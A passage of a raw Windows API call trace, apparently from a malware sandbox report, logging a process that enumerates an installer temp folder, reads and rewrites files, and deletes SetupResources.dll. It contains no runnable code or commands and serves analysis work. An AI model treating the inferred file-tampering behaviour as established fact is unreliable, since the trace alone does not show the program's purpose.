lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0062.606] GetLastError () returned 0x0 [0062.606] SetLastError (dwErrCode=0x0) [0062.606] GetLastError () returned 0x0 [0062.606] SetLastError (dwErrCode=0x0) [0062.606] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0062.606] GetLastError () returned 0x0 [0062.606] SetLastError (dwErrCode=0x0) [0062.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0062.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d660 [0062.606] GetLastError () returned 0x0 [0062.606] SetLastError (dwErrCode=0x0) [0062.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0062.607] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x960, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327ef70*=0x960, lpOverlapped=0x0) returned 1 [0062.607] GetLastError () returned 0x0 [0062.607] SetLastError (dwErrCode=0x0) [0062.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0062.607] GetLastError () returned 0x0 [0062.607] SetLastError (dwErrCode=0x0) [0062.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0062.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0062.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d660 | out: hHeap=0x20000) returned 1 [0062.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0062.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0062.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0062.607] CloseHandle (hObject=0x420) returned 1 [0062.609] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0062.609] CloseHandle (hObject=0x428) returned 1 [0062.609] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0062.609] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0062.609] AreFileApisANSI () returned 1 [0062.609] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0062.609] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x715b8 [0062.609] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 46 [0062.609] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0062.610] GetFileType (hFile=0x428) returned 0x1 [0062.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0062.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0062.610] GetLastError () returned 0xb7 [0062.610] SetLastError (dwErrCode=0xb7) [0062.611] WriteFile (in: hFile=0x428, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0062.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0062.614] CloseHandle (hObject=0x428) returned 1 [0062.614] AreFileApisANSI () returned 1 [0062.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0062.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71758 [0062.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 46 [0062.614] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll")) returned 1 [0062.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0062.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0062.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0062.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0062.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0062.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0062.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0062.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0062.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0062.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6f0 | out: hHeap=0x20000) returned 1 [0062.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0062.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b798 | out: hHeap=0x20000) returned 1 [0062.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0062.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0062.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0062.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0062.615] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.615] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.615] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4f1, ftLastWriteTime.dwHighDateTime=0x1, nFileSizeHigh=0x0, nFileSizeLow=0x28bf8, dwReserved0=0x1, dwReserved1=0x0, cFileName="ƿ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧苐\x07̧비聐萀\x08賂̧")) returned 0 [0062.615] FindClose (in: hFindFile=0x782d0 | out: hFindFile=0x782d0) returned 1 [0062.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0062.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0062.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0062.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0062.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0062.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0062.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0062.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0062.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0062.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46978 | out: hHeap=0x20000) returned 1 [0062.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0062.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0062.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0062.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0062.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0062.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0062.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0062.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0062.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0062.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69490 [0062.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0062.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0062.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69490 | out: hHeap=0x20000) returned 1 [0062.617] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.617] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.617] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.617] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0062.617] AreFileApisANSI () returned 1 [0062.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1032", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1032", lpUsedDefaultChar=0x0) returned 27 [0062.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.617] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.617] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0062.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0062.617] AreFileApisANSI () returned 1 [0062.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0062.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78650 [0062.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x78650, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1032") returned 27 [0062.617] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032" (normalized: "c:\\588bce7c90097ed212\\1032"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0062.617] GetLastError () returned 0x5 [0062.617] GetLastError () returned 0x5 [0062.617] SetLastError (dwErrCode=0x5) [0062.617] GetLastError () returned 0x5 [0062.617] SetLastError (dwErrCode=0x5) [0062.617] GetLastError () returned 0x5 [0062.617] SetLastError (dwErrCode=0x5) [0062.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78650 | out: hHeap=0x20000) returned 1 [0062.618] AreFileApisANSI () returned 1 [0062.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0062.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x782d0 [0062.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x782d0, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1032") returned 27 [0062.618] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032" (normalized: "c:\\588bce7c90097ed212\\1032"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0062.618] GetLastError () returned 0x5 [0062.618] GetLastError () returned 0x5 [0062.618] SetLastError (dwErrCode=0x5) [0062.618] GetLastError () returned 0x5 [0062.618] SetLastError (dwErrCode=0x5) [0062.618] GetLastError () returned 0x5 [0062.618] SetLastError (dwErrCode=0x5) [0062.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x782d0 | out: hHeap=0x20000) returned 1 [0062.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0062.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0062.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.618] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.618] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.618] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.618] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0062.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0062.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0062.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0062.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0062.618] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="1033", cAlternateFileName="")) returned 1 [0062.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0062.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0062.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0062.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0062.619] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1032\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x785d0 [0062.619] FindNextFileW (in: hFindFile=0x785d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.619] FindNextFileW (in: hFindFile=0x785d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x22ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0062.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0062.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0062.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0062.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0062.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46208 [0062.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0062.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0062.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0062.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0062.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0062.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0062.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0062.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0062.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0062.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0062.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0062.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x719c8 [0062.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0062.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0062.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0062.619] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.619] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.620] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.620] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0062.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0062.620] AreFileApisANSI () returned 1 [0062.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1032\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1032\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0062.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0062.620] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.620] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0062.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0062.620] AreFileApisANSI () returned 1 [0062.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0062.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x693f0 [0062.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x693f0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 36 [0062.620] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0062.620] GetFileType (hFile=0x428) returned 0x1 [0062.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0062.620] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0062.621] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0062.621] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0062.621] CloseHandle (hObject=0x428) returned 1 [0062.621] AreFileApisANSI () returned 1 [0062.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0062.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69170 [0062.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x69170, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 36 [0062.621] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0062.621] GetFileType (hFile=0x428) returned 0x1 [0062.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0062.621] CloseHandle (hObject=0x428) returned 1 [0062.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0062.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0062.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0062.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0062.622] HeapFree (in: hHeap=0x20000, 